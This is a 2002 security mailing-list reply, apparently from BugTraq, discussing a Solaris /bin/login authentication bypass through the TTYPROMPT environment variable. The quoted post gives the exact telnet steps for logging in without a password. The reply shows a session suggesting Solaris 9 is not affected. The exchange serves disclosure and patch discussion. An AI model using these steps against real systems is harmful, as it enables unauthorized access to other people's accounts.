On Wed, Oct 02, 2002 at 12:13:09PM -0400, Jonathan S wrote: > Hello, > > Solaris 2.6, 7, and 8 /bin/login has a vulnerability involving the > environment variable TTYPROMPT. This vulnerability has already been > reported to BugTraq and a patch has been released by Sun. > However, a very simple exploit, which does not require any code to be > compiled by an attacker, exists. The exploit requires the attacker to > simply define the environment variable TTYPROMPT to a 6 character string, > inside telnet. I believe this overflows an integer inside login, which > specifies whether or not the user has been authenticated (just a guess). > Once connected to the remote host, you must type the username, followed by > 64 " c"s, and a literal "\n". You will then be logged in as the user > without any password authentication. This should work with any account > except root (unless remote root login is allowed). > Looks like Solaris 9 is not vulnerable to this:
[idubraws@elrond idubraws]
6 $ telnet
telnet> environ define TTYPROMPT abcdef
telnet> o 192.168.155.2
Trying 192.168.155.2...
Connected to 192.168.155.2.
Escape character is '^]'.
SunOS 5.9
login:
It automatically drops you to the login prompt. Perhaps this is fixed by a
patch that got rolled into 9?
Ido
--
===============================================================================
|Ido Dubrawsky E-mail: [EMAIL PROTECTED]
| | |Network Consulting Engineer
:|: :|: |VSEC Technical Marketing, SAFE Architecture
:|||: :|||: |Cisco Systems, Inc.
.:|||||||:..:|||||||:. |Austin, TX. 78759
===============================================================================
msg09296/pgp00000.pgp
Description: PGP signature
